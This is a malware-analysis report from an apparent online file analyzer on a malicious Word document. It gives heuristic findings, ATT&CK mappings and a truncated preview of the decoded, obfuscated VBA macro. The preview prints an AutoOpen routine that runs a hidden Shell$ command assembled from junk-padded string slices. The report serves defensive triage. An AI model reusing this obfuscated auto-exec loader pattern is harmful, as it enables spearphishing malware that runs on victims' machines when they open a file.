MALICIOUS
304
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro triggers the execution of a payload using the Shell() function. The presence of the 'Doc.Macro.Obfuscation-6355576-0' ClamAV detection and the 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' heuristic strongly indicate a macro-based malware delivery mechanism, likely intended to be delivered via spearphishing.
Heuristics 9
-
ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 244721 bytes |
SHA-256: 916fa25b0782e5b5f4d38b7a32a77d904b909db8c7a40a709e7c71fd517f3f79 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 104 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "UAliKtrOz" Sub AutoOpen() nTEjtuJvq = "nzdplYEVD" + "LwojTKbdN" + "CiblUJULq" + "frtNztsdb" Shell$ BtIPfiJlf, 0 WOJHmmwWT = "VDzuIQjHM" + "OBdUUahZi" + "JwwuqpiFP" + "EuvpozqzH" End Sub Function BtIPfiJlf() TiAusl = "ZfUYw0jPN0HAccBjCqzTaUkkFTUhdaQfdEKLjozkCZdEWijqZSUVCCQCkRVVwvGNXbWYRqzNqORAqjObkiILFvdbnHbSTinHTQjuHKYiSGfnlPMDCtkSmvHbwvkJPjuLaJhazUTZFZswQqpYvXQZtVUYIFvLaOTmMTMbilEiaLNNCJLIFMOsQURFoJSRWYCcXG1W39TBwfohHP1di" snbAFQbLo = Mid(TiAusl, 11, 177) OQwGNf = Array(Array(36, 58, 68, 52), Array(27, 96, 93, 80)) TtjmZnESDF = Array(Array(90, 11, 70, 51), Array(19, 19, 13, 26)) AvljHwp = Array(Array(55, 97, 13, 86), Array(42, 98, 48, 68)) jlqktDjfAOw = "MDuYHzrGGlzdNpKShziHHVztnGNAbVsBGnYSKJSMVHwXOirWDw8GnczFKX" KkFEWPFzWw = Mid(jlqktDjfAOw, 3, 47) lwTVZWoHwA = Array(Array(73, 90, 17, 79), Array(55, 68, 27, 26)) OQBiFSwWK = Array(Array(31, 22, 11, 75), Array(64, 47, 80, 14)) LGQuEzuiwJY = Array(Array(80, 27, 76, 12), Array(10, 80, 96, 56)) GpkSiAuY = "50YrnHSHnmiRQQRAlSlWWqdDaJGSXCJTjkdIWoqDWbIzQLUEmNkQpBYKhVRiBAjli0SZ9qzDbY1qvGNcHuJnnFstwodELsU" SFuiBNnqMQ = Mid(GpkSiAuY, 3, 62) SCFinAn = Array(Array(28, 89, 74, 20), Array(72, 34, 62, 18)) ihZTuIiwc = Array(Array(15, 72, 19, 63), Array(68, 32, 27, 83)) CJaLjzpLu = Array(Array(27, 88, 75, 10), Array(47, 48, 35, 28)) OWAUwQVW = "79ThpcnEzAOFjBbuUtioijnGnDrwFBbbctNzRjJQmzlLJYfGi05isjvRNJ" DKYof = Mid(OWAUwQVW, 4, 42) vaHkwjcQ = Array(Array(79, 27, 81, 27), Array(61, 74, 10, 17)) bjUti = Array(Array(74, 40, 69, 81), Array(28, 49, 66, 36)) jjRuA = Array(Array(96, 66, 19, 91), Array(76, 20, 96, 88)) tuJWCpiDM = "dIw7aOrJz5JJQsCjWNKmahXaAHaFoQvfizahsJPKKVDkplLaqhrmOwdGimAJESrkQDSdVUrMzzbFdmkPwAPHZJRfVUzFJGGsdSUmShEVpfpOWYcvBkMDDkLHlmHEWJ" NhMvzhJMFOq = Mid(tuJWCpiDM, 15, 109) vfkviAas = Array(Array(88, 40, 18, 52), Array(81, 10, 52, 16)) ObNARm = Array(Array(43, 41, 39, 89), Array(40, 97, 61, 76)) kKoYu = Array(Array(22, 28, 69, 60), Array(44, 74, 97, 21)) bjwPGkVibi = "IWi8kdcY6cKtivMGHwNNR8NiiMc6Ql0vbMrwzDGhwjDkIAcupDZjSMiRuvFGqiEkhzOoTHKGOhuNOhGBImjkZadpVaDBwAqUbTCIlnahsTRlRUCMp5q2kj" BwiNMmkwvT = Mid(bjwPGkVibi, 35, 79) HuvhwvfY = Array(Array(83, 35, 88, 56), Array(50, 16, 58, 12)) DZTswXtMtd = Array(Array(45, 53, 79, 54), Array(15, 13, 80, 77)) UvRRBvjI = Array(Array(58, 60, 75, 34), Array(81, 88, 51, 17)) RGioYJS = "IwZRMn4dmaES3PvXchXoZYFtPRcCLkMLqDbjHAkSqusiGklVcwUadvoCTDcGizBhCCOjUiIPwFwifbmijHZPQlivPYQDXinssLcEVBAunEdYzJWrRwaXXmQQUTUvSErSRFmTziJiHfbLIKwFCYmZDQUFuLjBhFcjNKGrXDsjovPsLFIKVOttSSOBljYnwHwBDU2Y" wqoIbzQ = Mid(RGioYJS, 18, 176) qtnKjTNd = Array(Array(75, 73, 46, 82), Array(44, 81, 21, 95)) hwrTUkzO = Array(Array(69, 90, 41, 88), Array(78, 97, 87, 12)) lFwpHqzC = Array(Array(29, 84, 32, 56), Array(10, 58, 19, 82)) jIVjJQPt = "sBVmCqsjbLSzwPvtRuTCJzsDDZuCotHMAjZDADcwVnzRdEnwIKSQnidKJRicwquhDGwQqrtORVhVAbZzlztiarYSDOuiUACfsPNWHXGQQEzSBHKirirwwQGLiiMbzKtRTCckNDsOrcNWsFQvELqmJo0FI4EU7zwpL8p7qd4AIQjH5H0iAvTptcsK" dFpipPIa = Mid(jIVjJQPt, 2, 148) bwbXVT = Array(Array(67, 52, 46, 37), Array(49, 46, 21, 99)) bXwcttjpwF = Array(Array(94, 92, 25, 77), Array(13, 83, 69, 88)) LoiWwEGnX = Array(Array(40, 39, 62, 71), Array(54, 99, 64, 70)) sliZiYuuY = "wHzpLbNnoIiGRRhM4V2BWvcz0hEzEuULGVZTsEJHOqZmvfzPUMBsFJsXAYqMuCmZHHvnMUhdiLDvriGhrpdssbFzdBSUNzNLDAfnjKCAiYJuFzfSRJVFZujfCwJLBMQlwsrrCTzjmdNURKrjWADEcHlJTzllArwRIYwNFnPwLoSwhMOrGdoAJLJqGhXDhMj24" FFhfqjLFwt = Mid(sliZiYuuY, 27, 164) dmmmo = Array(Array(37, 76, 92, 57), Array(48, 22, 18, 55)) bXkpizbJRA = Array(Array(37, 98, 92, 77), Array(91, 74, 42, 50)) pOlwiEpEQ = Array(Array(78, 15, 56, 24), Array(19, 47, 53, 71)) uNMwFZ = "sMHHIQRvfDicIBocKiTFLhzziaUoqcGTCkTcOQXlUHIPTAbLOQDNJIKKGRRdrBvjzPZYiMOuGhlEZjjiwJaaZtJuZJVwztuTLbSDaDdCBIGcWGkXkmfhaVGDGiwYqRuMmSszRdDvjYYQnhXT ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.